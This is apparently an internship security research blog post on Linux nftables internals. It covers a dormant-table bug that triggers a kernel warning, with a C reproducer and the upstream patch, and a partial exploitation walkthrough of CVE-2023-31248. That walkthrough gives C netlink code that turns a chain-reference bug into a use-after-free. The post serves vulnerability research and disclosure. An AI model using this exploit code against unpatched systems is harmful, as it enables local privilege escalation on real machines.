During my internship, I have been researching and trying to find bugs within the nftables subsystem. In this blog post, I will talk about a bug I have found, as well as the exploitation of an n-day discovered by Mingi Cho – CVE-2023-31248.

Introduction to nftables

nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.


Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table.

 *	struct nft_table - nf_tables table
 *	@list: used internally
 *	@chains_ht: chains in the table
 *	@chains: same, for stable walks
 *	@sets: sets in the table
 *	@objects: stateful objects in the table
 *	@flowtables: flow tables in the table
 *	@hgenerator: handle generator state
 *	@handle: table handle
 *	@use: number of chain references to this table
 *	@flags: table flag (see enum nft_table_flags)
 *	@genmask: generation mask
 *	@afinfo: address family info
 *	@name: name of the table
 *	@validate_state: internal, set when transaction adds jumps
struct nft_table {
	struct list_head		list;
	struct rhltable			chains_ht;
	struct list_head		chains;
	struct list_head		sets;
	struct list_head		objects;
	struct list_head		flowtables;
	u64				hgenerator;
	u64				handle;
	u32				use;
	u16				family:6,
	u32				nlpid;
	char		    *name;
	u16				udlen;
	u8				*udata;
	u8				validate_state;

A table can have multiple different flags. The user is able to set the flags NFT_TABLE_F_DORMANT and/or NFT_TABLE_F_OWNER when the table is created (nf_tables_newtable). The dormant state flag (NFT_TABLE_F_DORMANT) can be updated in nf_tables_updtable. If NFT_TABLE_F_DORMANT (0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE flags, which consist of __NFT_TABLE_F_WAS_AWAKEN and __NFT_TABLE_F_WAS_DORMANT.


Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain.

 *	struct nft_chain - nf_tables chain
 *	@rules: list of rules in the chain
 *	@list: used internally
 *	@rhlhead: used internally
 *	@table: table that this chain belongs to
 *	@handle: chain handle
 *	@use: number of jump references to this chain
 *	@flags: bitmask of enum nft_chain_flags
 *	@name: name of the chain
struct nft_chain {
	struct nft_rule_blob		__rcu *blob_gen_0;
	struct nft_rule_blob		__rcu *blob_gen_1;
	struct list_head		rules;
	struct list_head		list;
	struct rhlist_head		rhlhead;
	struct nft_table		*table;
	u64				handle;
	u32				use;
	u8				flags:5,
	char			*name;
	u16				udlen;
	u8				*udata;

	/* Only used during control plane commit phase: */
	struct nft_rule_blob		*blob_next;

Basechains are represented by struct nft_base_chain.

 *	struct nft_base_chain - nf_tables base chain
 *	@ops: netfilter hook ops
 *	@hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
 *	@type: chain type
 *	@policy: default policy
 *	@stats: per-cpu chain stats
 *	@chain: the chain
 *	@flow_block: flow block (for hardware offload)
struct nft_base_chain {
	struct nf_hook_ops		ops;
	struct list_head		hook_list;
	const struct nft_chain_type	*type;
	u8				policy;
	u8				flags;
	struct nft_stats __percpu	*stats;
	struct nft_chain		chain;
	struct flow_block		flow_block;


Rules contain nftables expressions. Internally, rules are represented by struct nft_rule.

 *	struct nft_rule - nf_tables rule
 *	@list: used internally
 *	@handle: rule handle
 *	@genmask: generation mask
 *	@dlen: length of expression data
 *	@udata: user data is appended to the rule
 *	@data: expression data
struct nft_rule {
	struct list_head		list;
	u64				handle:42,
	unsigned char			data[]
		__attribute__((aligned(__alignof__(struct nft_expr))));


Expressions act as the operations of the state machine. There are many expressions; here are some examples:

  • Bitwise: Performs bitwise operations
  • Immediate: To load data into registers. Also allows for jumps/goto to another normal chain
  • Byteorder: To change from host/network endianness
  • Compare: To compare values in two registers
  • Counter: To enable counters in rules

Internally, expressions are represented by struct nft_expr.

 *	struct nft_expr - nf_tables expression
 *	@ops: expression ops
 *	@data: expression private data
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]

Each expression also has a struct nft_expr_ops representing various operations.

 *	struct nft_expr_ops - nf_tables expression operations
 *	@eval: Expression evaluation function
 *	@size: full expression size, including private data size
 *	@init: initialization function
 *	@activate: activate expression in the next generation
 *	@deactivate: deactivate expression in next generation
 *	@destroy: destruction function, called after synchronize_rcu
 *	@dump: function to dump parameters
 *	@type: expression type
 *	@validate: validate expression, called during loop detection
 *	@data: extra data to attach to this expression operation
 struct nft_expr_ops {
	void			(*eval)(const struct nft_expr *expr,
						struct nft_regs *regs,
						const struct nft_pktinfo *pkt);
	int				(*clone)(struct nft_expr *dst,
						const struct nft_expr *src);
	unsigned int	size;
	int				(*init)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						const struct nlattr * const tb[]);
	void			(*activate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	void			(*deactivate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						enum nft_trans_phase phase);
	void			(*destroy)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	void			(*destroy_clone)(const struct nft_ctx *ctx,
						const struct nft_expr *expr);
	int				(*dump)(struct sk_buff *skb,
						const struct nft_expr *expr,
						bool reset);
	int				(*validate)(const struct nft_ctx *ctx,
						const struct nft_expr *expr,
						const struct nft_data **data);
	bool			(*reduce)(struct nft_regs_track *track,
					    const struct nft_expr *expr);
	bool			(*gc)(struct net *net,
					    const struct nft_expr *expr);
	int				(*offload)(struct nft_offload_ctx *ctx,
						struct nft_flow_rule *flow,
						const struct nft_expr *expr);
	bool			(*offload_action)(const struct nft_expr *expr);
	void			(*offload_stats)(struct nft_expr *expr,
						const struct flow_stats *stats);
	const struct nft_expr_type	*type;
	void				        *data;

Genmask System

Many nftables objects have a 2 bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining the bit that represents the current generation. Objects can have the following states:

  • Active in both the current and next generation (e.g. unchanged objects)
  • Active in the current generation, inactive in the next generation (e.g. objects marked for deletion)
  • Inactive in the current generation, active in the next generation (e.g. newly created objects)

Control Plane, Transaction System and Transaction Worker

In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which includes functions such as nf_tables_newtable, nf_tables_updtable, nf_tables_newchain and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.

When a netlink batch transaction is considered to be valid (i.e. all actions in the control plane do not return errors), the commit phase is entered and nf_tables_commit is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work).

The asynchronous transaction worker, when run, will call nft_commit_release, which will finally call functions that will destroy and free objects marked for deletion.

nftables Dormant State Chain Hook Deactivation Bug

While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1

When a newly created table is updated via nf_tables_updtable from active to dormant, the table flag is set to NFT_TABLE_F_DORMANT, and as none of the __NFT_TABLE_F_UPDATE flags are set, the __NFT_TABLE_F_WAS_AWAKEN flag will be set. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT flag is unset. It then checks if any of the __NFT_TABLE_F_UPDATE flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable (i.e. before nf_tables_commit is called). This code behaviour can be seen below:

static int nf_tables_updtable(struct nft_ctx *ctx) {
		if ((flags & NFT_TABLE_F_DORMANT) &&
	    !(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
		ctx->table->flags |= NFT_TABLE_F_DORMANT;
		if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
			ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
	} else if (!(flags & NFT_TABLE_F_DORMANT) &&
		   ctx->table->flags & NFT_TABLE_F_DORMANT) {
		ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
		if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
			ret = nf_tables_table_enable(ctx->net, ctx->table);
			if (ret < 0)
				goto err_register_hooks;

			ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;

It is possible to activate/deactivate tables in a way such that at one point of time, some chains are registered and some are not registered. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN flag, which is one of the __NFT_TABLE_F_UPDATE flags, is set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE flags is set, nf_tables_table_enable is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook only checks if the NFT_TABLE_F_DORMANT flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they are not registered in the first place. This causes the following warning to be displayed:

[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS:  00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044]  <TASK>
[ 1411.172713]  ? __warn+0x9c/0x200
[ 1411.174282]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416]  ? report_bug+0x1f2/0x220
[ 1411.177947]  ? handle_bug+0x3c/0x80
[ 1411.179123]  ? exc_invalid_op+0x13/0x40
[ 1411.180361]  ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887]  ? preempt_count_sub+0xf/0xc0
[ 1411.183772]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357]  ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045]  nf_tables_commit+0x1a15/0x2600
[ 1411.189373]  ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535]  ? __pfx_lock_release+0x20/0x20
[ 1411.193486]  ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470]  nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345]  ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436]  ? find_held_lock+0x83/0xa0
[ 1411.200948]  nfnetlink_rcv+0x1da/0x220
[ 1411.202570]  ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341]  ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507]  netlink_unicast+0x2ca/0x460
[ 1411.208166]  ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278]  ? __virt_addr_valid+0xd4/0x160
[ 1411.212405]  netlink_sendmsg+0x3d5/0x700
[ 1411.214076]  ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943]  ? import_ubuf+0xc1/0x100
[ 1411.217517]  ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358]  sock_sendmsg+0xda/0xe0
[ 1411.220915]  ? import_iovec+0x54/0x80
[ 1411.222655]  ____sys_sendmsg+0x436/0x500
[ 1411.224223]  ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046]  ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928]  ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274]  ? find_held_lock+0x83/0xa0
[ 1411.230507]  ___sys_sendmsg+0xf8/0x160
[ 1411.231712]  ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656]  ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285]  ? sock_has_perm+0xc9/0x1a0
[ 1411.236601]  ? __fget_light+0xda/0x100
[ 1411.238418]  __sys_sendmsg+0xe5/0x180
[ 1411.240445]  ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861]  ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273]  ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890]  do_syscall_64+0x3a/0xa0
[ 1411.246060]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8

This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0

Triggering the Bug

To trigger the bug, the following steps should be taken (in the same batch transaction):

  1. Create a table “test_table” – this table is active [1]
  2. Update the table “test_table” from active to dormant [2]
     a. The NFT_TABLE_F_DORMANT and __NFT_TABLE_F_WAS_AWAKEN table flags are set
  3. Add a basechain “chain1” – this basechain is added to a dormant table and hence is not registered [3]
  4. Update the table “test_table” from dormant to active [4]
     a. The NFT_TABLE_F_DORMANT flag is zeroed out, but the __NFT_TABLE_F_WAS_AWAKEN flag is still set, causing nf_tables_table_enable to be skipped
  5. Delete the active table “test_table” using the nft utility: nft delete table test_table [5]

The table is active when it is deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.

#define _GNU_SOURCE
#include <stdio.h> 
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>

#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>

struct unft_base_chain_param {
    uint32_t hook_num;
    uint32_t prio;

struct nftnl_table* build_table(char* name, uint16_t family) {
    struct nftnl_table* t = nftnl_table_alloc();
    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
    return t;

struct nftnl_chain* build_chain(char* table_name, char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
    struct nftnl_chain* c;
    c = nftnl_chain_alloc();
    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
    if (base_param) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
    if (chain_id) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
    return c;

int main(void) {
    struct nlmsghdr *nlh;
    struct mnl_nlmsg_batch *batch;
    int ret;
    int seq = time(NULL);
    uint8_t family = NFPROTO_IPV4;

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {

    // Start nl message
	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Create active table "test_table" [1]
    struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
	// Update table "test_table" -- table is now dormant [2]
	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
    nftnl_table_nlmsg_build_payload(nlh, t);
    // Add basechain "chain1" -- not registered [3]
    struct unft_base_chain_param bp2;
    bp2.hook_num = NF_INET_LOCAL_OUT;
    bp2.prio = 11;
    struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
	// Update table "test_table" -- table is now active [4]
	nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
    nftnl_table_nlmsg_build_payload(nlh, t);
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message
    printf("[+] Sending netlink message 1\n");
	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
    // Trigger warning [5]
    system("nft delete table test_table");

    return 0;

Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0, resulting in another warning, preventing us from reaching the free.

Patch Analysis

To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
 	     flags & NFT_TABLE_F_OWNER))
 		return -EOPNOTSUPP;
+	/* No dormant off/on/off/on games in single transaction */
+	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+		return -EINVAL;
 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
 				sizeof(struct nft_trans_table));
 	if (trans == NULL)

If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable will simply fail.


Other than trying to find new bugs, I also conducted n-day research on CVE-2023-31248, which was discovered by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89

Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. The exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.

Vulnerability Analysis

nft_chain_lookup_byid does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:

static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
					       const struct nft_table *table,
					       const struct nlattr *nla)
	struct nftables_pernet *nft_net = nft_pernet(net);
	u32 id = ntohl(nla_get_be32(nla));
	struct nft_trans *trans;

	list_for_each_entry(trans, &nft_net->commit_list, list) {
		struct nft_chain *chain = trans->ctx.chain;

		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
		    chain->table == table &&
		    id == nft_trans_chain_id(trans))
			return chain;
	return ERR_PTR(-ENOENT);

When adding a rule to a chain referring to its ID, if that chain had been deleted in the same batch, it is possible to refer to an inactive chain. Destruction of the deleted chain will then fail because the value of chain->use is not 0, resulting in a warning being displayed.

Triggering the bug with a single batch transaction

To trigger the bug, a batch transaction can be sent comprising the following steps:

  1. Create a new table “table1” (NFT_MSG_NEWTABLE)
  2. Create a new chain “chain1” (NFT_MSG_NEWCHAIN)
  3. Delete “chain1” (NFT_MSG_DELCHAIN)
  4. Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
  5. Create a rule inside chain2 referencing chain1. This can be done with a jump or goto expression with the destination chain set to chain1’s chain ID. (NFT_MSG_NEWRULE)

When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.

    -> nf_tables_newexpr 
        -> nft_immediate_init 
            -> nft_data_init 
                -> nft_verdict_init 

As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch calls the commit operation for nf_tables_subsys, which is nf_tables_commit.

Note that the struct nft_chain chain1 object is not immediately deleted when NFT_MSG_DELCHAIN is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:

    -> nf_tables_commit_release
        -> nf_tables_trans_destroy_work 
            -> nft_commit_release
                -> nf_tables_chain_destroy

However, in this case, when nf_tables_chain_destroy is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).

void nf_tables_chain_destroy(struct nft_ctx *ctx)
	struct nft_chain *chain = ctx->chain;
	struct nft_hook *hook, *next;

	if (WARN_ON(chain->use > 0))                                     <-- [6]

	/* no concurrent access possible anymore */

	if (nft_is_base_chain(chain)) {
		struct nft_base_chain *basechain = nft_base_chain(chain);

		if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
			list_for_each_entry_safe(hook, next,
						 &basechain->hook_list, list) {
				kfree_rcu(hook, rcu);
		if (rcu_access_pointer(basechain->stats)) {
	} else {


Obtaining a Use-After-Free

The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy is called, the chain object is freed. This can be done via exploiting the race condition between the control plane (nf_tables_delrule) and the transaction worker (nf_tables_trans_destroy_work).

In order to do this, 2 batch transactions were sent. In the first batch transaction, the following actions were performed:

  1. Create a new table “test_table” (NFT_MSG_NEWTABLE)
  2. Create a new chain “chain1” with name “AAAAAAAAAAAAAAAAAAAA” (NFT_MSG_NEWCHAIN). The name of the chain is 20 characters long. This is the chain to be deleted.
  3. Delete chain 1 (NFT_MSG_DELCHAIN)
  4. Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
  5. Create a rule inside “chain2” referencing chain 1 with name “AAAAAAAAAAAAAAAAAAAA”. In the exploit, this was done with an immediate “goto” expression with the destination chain set to the target chain using the chain ID.
    // Start nl message 1
	batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
	nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Create table 
    struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
    family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
    // Create chain 1
    struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    // Delete chain 1
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    // Create chain 2
    struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c2);
    // Create rule pointing to chain 1
    struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++); 
    // Add immediate expr to rule
    struct nftnl_expr *e = nftnl_expr_alloc("immediate");
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
    nftnl_rule_add_expr(r, e); 
    nftnl_rule_nlmsg_build_payload(nlh, r);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message
    printf("[+] Sending netlink message 1\n");
	ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
	if (ret == -1) {

As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.

The second batch transaction consists of the following operations:

  1. Delete the rule referencing the target chain (NFT_MSG_DELRULE)
  2. Create an invalid rule. In this case, audit_info->type can take values ranging from 0 to 2 inclusive, so 0xff is an invalid value which will cause the batch to fail. [7]
    // Start nl message 2
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    // Delete rule 1 
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, r);
    // Fail the batch using a invalid rule
    struct nftnl_rule *r2 = nftnl_rule_alloc();
    nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
    nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
    nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");

    struct xt_audit_info *audit_info;
    audit_info = malloc(sizeof(struct xt_audit_info));
    audit_info->type = 0xff;                                         <-- [7]
    struct nftnl_expr *e2 = nftnl_expr_alloc("target");
    nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
    nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
    nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
    nftnl_rule_add_expr(r2, e2);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, r2);
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    // Send netlink message 2
    printf("[+] Sending netlink message 2\n");
    ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
    if (ret == -1) {

As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).

As NFT_MSG_DELRULE was passed to nftables, the following code path is taken:

    -> nft_delrule_by_chain
        -> nft_delrule
            -> nft_rule_expr_deactivate
                -> nft_immediate_deactivate
                    -> nft_data_release
                        -> nft_verdict_uninit

Specifically, in nft_verdict_uninit, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.

static void nft_verdict_uninit(const struct nft_data *data)
	struct nft_chain *chain;
	struct nft_rule *rule;

	switch (data->verdict.code) {
	case NFT_JUMP:
	case NFT_GOTO:
		chain = data->verdict.chain;

Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work runs, and the transaction worker must run before the failed batch transaction is aborted.

If the rule is marked for deletion before nf_tables_chain_destroy is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the chain is freed in the order chain->name, chain->udata, and chain. The struct nft_chain object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space where chain, chain->name and chain->udata originally were can now be reclaimed with another object to aid us in our exploitation.

Obtaining a kernel text leak

Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.

The struct nft_chain object is allocated when nftables receives an NFT_MSG_NEWCHAIN message. In the control plane, nf_tables_newchain calls nf_tables_addchain, which allocates the new chain object in the kmalloc-cg-128 cache. chain->udata and chain->name are allocated in their respective kmalloc-cg caches by nla_memdup and nla_strdup respectively.

static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
			      u8 policy, u32 flags,
			      struct netlink_ext_ack *extack)
		chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
		if (chain == NULL)
			return -ENOMEM;
	if (nla[NFTA_CHAIN_NAME]) {
